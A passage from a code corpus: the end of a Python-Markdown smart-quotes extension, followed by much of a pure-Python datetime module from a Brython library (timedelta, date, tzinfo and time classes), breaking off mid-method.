self._addPatterns(md, patterns, 'quotes')
def extendMarkdown(self, md, md_globals):
configs = self.getConfigs()
self.inlinePatterns = OrderedDict()
if configs['smart_ellipses']:
self.educateEllipses(md)
if configs['smart_quotes']:
self.educateQuotes(md)
if configs['smart_angled_quotes']:
self.educateAngledQuotes(md)
# Override HTML_RE from inlinepatterns.py so that it does not
# process tags with duplicate closing quotes.
md.inlinePatterns["html"] = HtmlPattern(HTML_STRICT_RE, md)
if configs['smart_dashes']:
self.educateDashes(md)
inlineProcessor = InlineProcessor(md)
inlineProcessor.inlinePatterns = self.inlinePatterns
md.treeprocessors.add('smarty', inlineProcessor, '_end')
md.ESCAPED_CHARS.extend(['"', "'"])
def makeExtension(*args, **kwargs):
return SmartyExtension(*args, **kwargs)
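# A minimal usage sketch (assumption: the Python-Markdown package this
# extension ships with is importable as ``markdown``):
#
#     import markdown
#     html = markdown.markdown('He said, "wait" -- then left...',
#                              extensions=[makeExtension()])
#     # straight quotes become curly, "--" an en dash, "..." an ellipsis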
| mit |
4022321818/40223218w11 | static/Brython3.1.0-20150301-090019/Lib/datetime.py | 628 | 75044 | """Concrete date/time and related types.
See http://www.iana.org/time-zones/repository/tz-link.html for
time zone and DST data sources.
"""
import time as _time
import math as _math
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
MINYEAR = 1
MAXYEAR = 9999
_MAXORDINAL = 3652059 # date.max.toordinal()
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
_DAYS_IN_MONTH = [None, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
_DAYS_BEFORE_MONTH = [None]
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
_DAYS_BEFORE_MONTH.append(dbm)
dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
"year, month -> number of days in that month in that year."
assert 1 <= month <= 12, month
if month == 2 and _is_leap(year):
return 29
return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
"year, month -> number of days in year preceding first day of month."
assert 1 <= month <= 12, 'month must be in 1..12'
return _DAYS_BEFORE_MONTH[month] + (month > 2 and _is_leap(year))
def _ymd2ord(year, month, day):
"year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
assert 1 <= month <= 12, 'month must be in 1..12'
dim = _days_in_month(year, month)
assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
return (_days_before_year(year) +
_days_before_month(year, month) +
day)
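# For example, _ymd2ord(1, 1, 1) == 1 (the calendar's day 1) and
# _ymd2ord(2, 1, 1) == 366, since year 1 has 365 days.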
_DI400Y = _days_before_year(401) # number of days in 400 years
_DI100Y = _days_before_year(101) # " " " " 100 "
_DI4Y = _days_before_year(5) # " " " " 4 "
# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1
# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1
# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1
def _ord2ymd(n):
"ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
# n is a 1-based index, starting at 1-Jan-1. The pattern of leap years
# repeats exactly every 400 years. The basic strategy is to find the
# closest 400-year boundary at or before n, then work with the offset
# from that boundary to n. Life is much clearer if we subtract 1 from
# n first -- then the values of n at 400-year boundaries are exactly
# those divisible by _DI400Y:
#
# D M Y n n-1
# -- --- ---- ---------- ----------------
# 31 Dec -400 -_DI400Y -_DI400Y -1
# 1 Jan -399 -_DI400Y +1 -_DI400Y 400-year boundary
# ...
# 30 Dec 000 -1 -2
# 31 Dec 000 0 -1
# 1 Jan 001 1 0 400-year boundary
# 2 Jan 001 2 1
# 3 Jan 001 3 2
# ...
# 31 Dec 400 _DI400Y _DI400Y -1
# 1 Jan 401 _DI400Y +1 _DI400Y 400-year boundary
n -= 1
n400, n = divmod(n, _DI400Y)
year = n400 * 400 + 1 # ..., -399, 1, 401, ...
# Now n is the (non-negative) offset, in days, from January 1 of year, to
# the desired date. Now compute how many 100-year cycles precede n.
# Note that it's possible for n100 to equal 4! In that case 4 full
# 100-year cycles precede the desired day, which implies the desired
# day is December 31 at the end of a 400-year cycle.
n100, n = divmod(n, _DI100Y)
# Now compute how many 4-year cycles precede it.
n4, n = divmod(n, _DI4Y)
# And now how many single years. Again n1 can be 4, and again meaning
# that the desired day is December 31 at the end of the 4-year cycle.
n1, n = divmod(n, 365)
year += n100 * 100 + n4 * 4 + n1
if n1 == 4 or n100 == 4:
assert n == 0
return year-1, 12, 31
# Now the year is correct, and n is the offset from January 1. We find
# the month via an estimate that's either exact or one too large.
leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
assert leapyear == _is_leap(year)
month = (n + 50) >> 5
preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
if preceding > n: # estimate is too large
month -= 1
preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
n -= preceding
assert 0 <= n < _days_in_month(year, month)
# Now the year and month are correct, and n is the offset from the
# start of that month: we're done!
return year, month, n+1
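# For example, _ord2ymd(366) == (2, 1, 1), inverting _ymd2ord(2, 1, 1),
# and _ord2ymd(_MAXORDINAL) == (9999, 12, 31).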
# Month and day names. For localized versions, see the calendar module.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
wday = (_ymd2ord(y, m, d) + 6) % 7
dnum = _days_before_month(y, m) + d
return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
def _wrap_strftime(object, format, timetuple):
# Don't call utcoffset() or tzname() unless actually needed.
freplace = None # the string to use for %f
zreplace = None # the string to use for %z
Zreplace = None # the string to use for %Z
# Scan format for %z and %Z escapes, replacing as needed.
newformat = []
push = newformat.append
i, n = 0, len(format)
while i < n:
ch = format[i]
i += 1
if ch == '%':
if i < n:
ch = format[i]
i += 1
if ch == 'f':
if freplace is None:
freplace = '%06d' % getattr(object,
'microsecond', 0)
newformat.append(freplace)
elif ch == 'z':
if zreplace is None:
zreplace = ""
if hasattr(object, "utcoffset"):
offset = object.utcoffset()
if offset is not None:
sign = '+'
if offset.days < 0:
offset = -offset
sign = '-'
h, m = divmod(offset, timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
zreplace = '%c%02d%02d' % (sign, h, m)
assert '%' not in zreplace
newformat.append(zreplace)
elif ch == 'Z':
if Zreplace is None:
Zreplace = ""
if hasattr(object, "tzname"):
s = object.tzname()
if s is not None:
# strftime is going to have at this: escape %
Zreplace = s.replace('%', '%%')
newformat.append(Zreplace)
else:
push('%')
push(ch)
else:
push('%')
else:
push(ch)
newformat = "".join(newformat)
return _time.strftime(newformat, timetuple)
def _call_tzinfo_method(tzinfo, methname, tzinfoarg):
if tzinfo is None:
return None
return getattr(tzinfo, methname)(tzinfoarg)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
assert name in ("utcoffset", "dst")
if offset is None:
return
if not isinstance(offset, timedelta):
raise TypeError("tzinfo.%s() must return None "
"or timedelta, not '%s'" % (name, type(offset)))
if offset % timedelta(minutes=1) or offset.microseconds:
raise ValueError("tzinfo.%s() must return a whole number "
"of minutes, got %s" % (name, offset))
if not -timedelta(1) < offset < timedelta(1):
raise ValueError("%s()=%s, must be must be strictly between"
" -timedelta(hours=24) and timedelta(hours=24)"
% (name, offset))
def _check_date_fields(year, month, day):
if not isinstance(year, int):
raise TypeError('int expected')
if not MINYEAR <= year <= MAXYEAR:
raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
if not 1 <= month <= 12:
raise ValueError('month must be in 1..12', month)
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
raise ValueError('day must be in 1..%d' % dim, day)
def _check_time_fields(hour, minute, second, microsecond):
if not isinstance(hour, int):
raise TypeError('int expected')
if not 0 <= hour <= 23:
raise ValueError('hour must be in 0..23', hour)
if not 0 <= minute <= 59:
raise ValueError('minute must be in 0..59', minute)
if not 0 <= second <= 59:
raise ValueError('second must be in 0..59', second)
if not 0 <= microsecond <= 999999:
raise ValueError('microsecond must be in 0..999999', microsecond)
def _check_tzinfo_arg(tz):
if tz is not None and not isinstance(tz, tzinfo):
raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
class timedelta:
"""Represent the difference between two datetime objects.
Supported operators:
- add, subtract timedelta
- unary plus, minus, abs
- compare to timedelta
- multiply, divide by int
In addition, datetime supports subtraction of two datetime objects
returning a timedelta, and addition or subtraction of a datetime
and a timedelta giving a datetime.
Representation: (days, seconds, microseconds). Why? Because I
felt like it.
"""
__slots__ = '_days', '_seconds', '_microseconds'
def __new__(cls, days=0, seconds=0, microseconds=0,
milliseconds=0, minutes=0, hours=0, weeks=0):
# Doing this efficiently and accurately in C is going to be difficult
# and error-prone, due to ubiquitous overflow possibilities, and that
# C double doesn't have enough bits of precision to represent
# microseconds over 10K years faithfully. The code here tries to make
# explicit where go-fast assumptions can be relied on, in order to
# guide the C implementation; it's way more convoluted than speed-
# ignoring auto-overflow-to-long idiomatic Python could be.
# XXX Check that all inputs are ints or floats.
# Final values, all integer.
# s and us fit in 32-bit signed ints; d isn't bounded.
d = s = us = 0
# Normalize everything to days, seconds, microseconds.
days += weeks*7
seconds += minutes*60 + hours*3600
microseconds += milliseconds*1000
# Get rid of all fractions, and normalize s and us.
# Take a deep breath <wink>.
if isinstance(days, float):
dayfrac, days = _math.modf(days)
daysecondsfrac, daysecondswhole = _math.modf(dayfrac * (24.*3600.))
assert daysecondswhole == int(daysecondswhole) # can't overflow
s = int(daysecondswhole)
assert days == int(days)
d = int(days)
else:
daysecondsfrac = 0.0
d = days
assert isinstance(daysecondsfrac, float)
assert abs(daysecondsfrac) <= 1.0
assert isinstance(d, int)
assert abs(s) <= 24 * 3600
# days isn't referenced again before redefinition
if isinstance(seconds, float):
secondsfrac, seconds = _math.modf(seconds)
assert seconds == int(seconds)
seconds = int(seconds)
secondsfrac += daysecondsfrac
assert abs(secondsfrac) <= 2.0
else:
secondsfrac = daysecondsfrac
# daysecondsfrac isn't referenced again
assert isinstance(secondsfrac, float)
assert abs(secondsfrac) <= 2.0
assert isinstance(seconds, int)
days, seconds = divmod(seconds, 24*3600)
d += days
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 2 * 24 * 3600
# seconds isn't referenced again before redefinition
usdouble = secondsfrac * 1e6
assert abs(usdouble) < 2.1e6 # exact value not critical
# secondsfrac isn't referenced again
if isinstance(microseconds, float):
microseconds += usdouble
microseconds = round(microseconds, 0)
seconds, microseconds = divmod(microseconds, 1e6)
assert microseconds == int(microseconds)
assert seconds == int(seconds)
days, seconds = divmod(seconds, 24.*3600.)
assert days == int(days)
assert seconds == int(seconds)
d += int(days)
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 3 * 24 * 3600
else:
seconds, microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 3 * 24 * 3600
microseconds = float(microseconds)
microseconds += usdouble
microseconds = round(microseconds, 0)
assert abs(s) <= 3 * 24 * 3600
assert abs(microseconds) < 3.1e6
# Just a little bit of carrying possible for microseconds and seconds.
assert isinstance(microseconds, float)
assert int(microseconds) == microseconds
us = int(microseconds)
seconds, us = divmod(us, 1000000)
s += seconds # can't overflow
assert isinstance(s, int)
days, s = divmod(s, 24*3600)
d += days
assert isinstance(d, int)
assert isinstance(s, int) and 0 <= s < 24*3600
assert isinstance(us, int) and 0 <= us < 1000000
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
if abs(d) > 999999999:
raise OverflowError("timedelta # of days is too large: %d" % d)
return self
def __repr__(self):
if self._microseconds:
return "%s(%d, %d, %d)" % ('datetime.' + self.__class__.__name__,
self._days,
self._seconds,
self._microseconds)
if self._seconds:
return "%s(%d, %d)" % ('datetime.' + self.__class__.__name__,
self._days,
self._seconds)
return "%s(%d)" % ('datetime.' + self.__class__.__name__, self._days)
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
return ((self.days * 86400 + self.seconds)*10**6 +
self.microseconds) / 10**6
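# Example (illustrative): timedelta(days=1, seconds=30).total_seconds()
# evaluates to (86430 * 10**6 + 0) / 10**6 == 86430.0.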
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds)
return NotImplemented
def __rsub__(self, other):
if isinstance(other, timedelta):
return -self + other
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(-self._days,
-self._seconds,
-self._microseconds)
def __pos__(self):
return self
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if isinstance(other, int):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days * other,
self._seconds * other,
self._microseconds * other)
if isinstance(other, float):
a, b = other.as_integer_ratio()
return self * a / b
return NotImplemented
__rmul__ = __mul__
def _to_microseconds(self):
return ((self._days * (24*3600) + self._seconds) * 1000000 +
self._microseconds)
def __floordiv__(self, other):
if not isinstance(other, (int, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec // other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec // other)
def __truediv__(self, other):
if not isinstance(other, (int, float, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec / other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec / other)
if isinstance(other, float):
a, b = other.as_integer_ratio()
return timedelta(0, 0, b * usec / a)
def __mod__(self, other):
if isinstance(other, timedelta):
r = self._to_microseconds() % other._to_microseconds()
return timedelta(0, 0, r)
return NotImplemented
def __divmod__(self, other):
if isinstance(other, timedelta):
q, r = divmod(self._to_microseconds(),
other._to_microseconds())
return q, timedelta(0, 0, r)
return NotImplemented
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
return hash(self._getstate())
def __bool__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-999999999)
timedelta.max = timedelta(days=999999999, hours=23, minutes=59, seconds=59,
microseconds=999999)
timedelta.resolution = timedelta(microseconds=1)
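# Boundary sketch (illustrative): timedelta.max - timedelta.resolution is
# still representable, while timedelta.max + timedelta.resolution would
# carry into a 1000000000th day and raise OverflowError in __new__.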
class date:
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__cmp__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
if (isinstance(year, bytes) and len(year) == 4 and
1 <= year[2] <= 12 and month is None): # Month is sane
# Pickle support
self = object.__new__(cls)
self.__setstate(year)
return self
_check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Contruct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
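Example (illustrative): date.fromordinal(730920) is date(2002, 3, 11),
and date(2002, 3, 11).toordinal() returns 730920 again.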
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> d = date(2010, 1, 1)
>>> repr(d)
'datetime.date(2010, 1, 1)'
"""
return "%s(%d, %d, %d)" % ('datetime.' + self.__class__.__name__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
def strftime(self, fmt):
"Format using strftime()."
return _wrap_strftime(self, fmt, self.timetuple())
def __format__(self, fmt):
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
return "%04d-%02d-%02d" % (self._year, self._month, self._day)
__str__ = isoformat
# Read-only field accessors
@property
def year(self):
"""year (1-9999)"""
return self._year
@property
def month(self):
"""month (1-12)"""
return self._month
@property
def day(self):
"""day (1-31)"""
return self._day
# Standard conversions, __cmp__, __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
"""Return a new date with new values for the specified fields."""
if year is None:
year = self._year
if month is None:
month = self._month
if day is None:
day = self._day
_check_date_fields(year, month, day)
return date(year, month, day)
# Comparisons of date objects with other.
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
return NotImplemented
def __ne__(self, other):
if isinstance(other, date):
return self._cmp(other) != 0
return NotImplemented
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
return NotImplemented
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
return NotImplemented
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
return NotImplemented
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
return NotImplemented
def _cmp(self, other):
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
return hash(self._getstate())
# Computations
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
o = self.toordinal() + other.days
if 0 < o <= _MAXORDINAL:
return date.fromordinal(o)
raise OverflowError("result out of range")
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, timedelta):
return self + timedelta(-other.days)
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta(days1 - days2)
return NotImplemented
def weekday(self):
"Return day of the week, where Monday == 0 ... Sunday == 6."
return (self.toordinal() + 6) % 7
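# Example (illustrative): 2002-12-04 was a Wednesday, so
# date(2002, 12, 4).weekday() == 2 and .isoweekday() == 3.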
# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
"Return day of the week, where Monday == 1 ... Sunday == 7."
# 1-Jan-0001 is a Monday
return self.toordinal() % 7 or 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
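# Example (illustrative): date(2003, 12, 29).isocalendar() gives
# (2004, 1, 1), since that Monday starts ISO week 1 of 2004.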
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
return bytes([yhi, ylo, self._month, self._day]),
def __setstate(self, string):
if len(string) != 4 or not (1 <= string[2] <= 12):
raise TypeError("not enough arguments")
yhi, ylo, self._month, self._day = string
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo:
"""Abstract base class for time zone info classes.
Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc() requires a non-None dst() result")
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
return dt + dtdst
# Pickle support.
def __reduce__(self):
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
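# A minimal concrete subclass might look like the sketch below (comment
# only; the names are illustrative and not part of this module). It
# overrides the three required methods with a fixed zero offset:
#
# class FixedUTC(tzinfo):
#     def utcoffset(self, dt): return timedelta(0)
#     def tzname(self, dt): return "UTC+00:00"
#     def dst(self, dt): return timedelta(0)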
_tzinfo_class = tzinfo
class time:
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__cmp__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute, second, microsecond (all default to zero)
tzinfo (defaults to None)
"""
self = object.__new__(cls)
if isinstance(hour, bytes) and len(hour) == 6:
# Pickle support
self.__setstate(hour, minute or None)
return self
_check_tzinfo_arg(tzinfo)
_check_time_fields(hour, minute, second, microsecond)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other, allow_mixed=True) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, time):
return self._cmp(other, allow_mixed=True) != 0
else:
return True
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware times")
myhhmm = self._hour * 60 + self._minute - myoff//timedelta(minutes=1)
othhmm = other._hour * 60 + other._minute - otoff//timedelta(minutes=1)
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
tzoff = self.utcoffset()
if not tzoff: # zero or None
return hash(self._getstate()[0])
h, m = divmod(timedelta(hours=self.hour, minutes=self.minute) - tzoff,
timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
if 0 <= h < 24:
return hash(time(h, m, self.second, self.microsecond))
return hash((h, m, self.second, self.microsecond))
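# Hash sketch (illustrative): an aware time(5, 0) at UTC-05:00 normalizes
# to 10:00 UTC above, so it hashes equal to time(10, 0, tzinfo=timezone.utc).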
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
s= "%s(%d, %d%s)" % ('datetime.' + self.__class__.__name__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
def strftime(self, fmt):
"""Format using strftime(). The date part of the timestamp passed
to underlying strftime should not be used.
"""
# The year must be >= 1000 else Python's strftime implementation
# can raise a bogus exception.
timetuple = (1900, 1, 1,
self._hour, self._minute, self._second,
0, 1, -1)
return _wrap_strftime(self, fmt, timetuple)
def __format__(self, fmt):
